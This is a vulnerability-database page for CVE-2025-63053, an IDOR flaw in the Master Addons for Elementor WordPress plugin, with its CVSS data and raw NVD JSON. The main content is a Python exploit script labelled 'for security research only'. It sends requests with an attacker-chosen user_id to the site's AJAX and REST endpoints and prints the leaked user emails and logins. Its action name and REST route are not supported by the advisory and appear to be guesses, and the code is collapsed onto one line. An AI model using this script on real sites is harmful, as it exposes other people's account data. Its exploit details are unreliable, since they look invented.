Security Vulnerability Report
中文
CVE-2025-63053 CVSS 5.3 MEDIUM

CVE-2025-63053

Published: 2025-12-31 15:15:54
Last Modified: 2026-04-23 15:35:01

Description

Authorization Bypass Through User-Controlled Key vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Master Addons for Elementor <= 2.0.9.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63053 PoC - Master Addons for Elementor IDOR Vulnerability import requests import argparse def test_idor_vulnerability(target_url, target_user_id): """ Test for IDOR vulnerability in Master Addons for Elementor plugin This PoC demonstrates unauthorized access to other users' data """ # Target WordPress site with Master Addons plugin target = target_url.rstrip('/') # Try to access user data by manipulating user ID parameter # The plugin fails to properly validate user authorization endpoints = [ f"{target}/wp-admin/admin-ajax.php", f"{target}/wp-json/master-addons/v1/user-data", ] for endpoint in endpoints: # Craft request with controlled user ID to bypass authorization params = { 'action': 'master_addons_get_user_data', 'user_id': target_user_id # Attacker-controlled user ID } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) PoC-Tester', 'Content-Type': 'application/x-www-form-urlencoded' } try: response = requests.get(endpoint, params=params, headers=headers, timeout=10) # Check if unauthorized access was successful if response.status_code == 200: # Check response for sensitive data leakage if 'user_email' in response.text or 'user_login' in response.text: print(f"[!] VULNERABLE: IDOR detected at {endpoint}") print(f"[+] Successfully accessed user data for user_id: {target_user_id}") print(f"[+] Response preview: {response.text[:200]}...") return True except requests.exceptions.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability detected (may require manual testing)") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description='CVE-2025-63053 PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress site URL') parser.add_argument('-id', '--user-id', type=int, default=1, help='Target user ID to test IDOR') args = parser.parse_args() print(f"[*] Testing CVE-2025-63053 on {args.url}") test_idor_vulnerability(args.url, args.user_id) # Usage: python cve-2025-63053-poc.py -u https://target-site.com -id 1

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63053", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:54.470", "lastModified": "2026-04-23T15:35:01.107", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Liton Arefin Master Addons for Elementor master-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Master Addons for Elementor: from n/a through <= 2.0.9.9.4."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de una clave controlada por el usuario en Jewel Theme Master Addons para Elementor permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Master Addons para Elementor: desde n/a hasta 2.0.9.9.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/master-addons/vulnerability/wordpress-master-addons-for-elementor-plugin-2-0-9-9-4-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}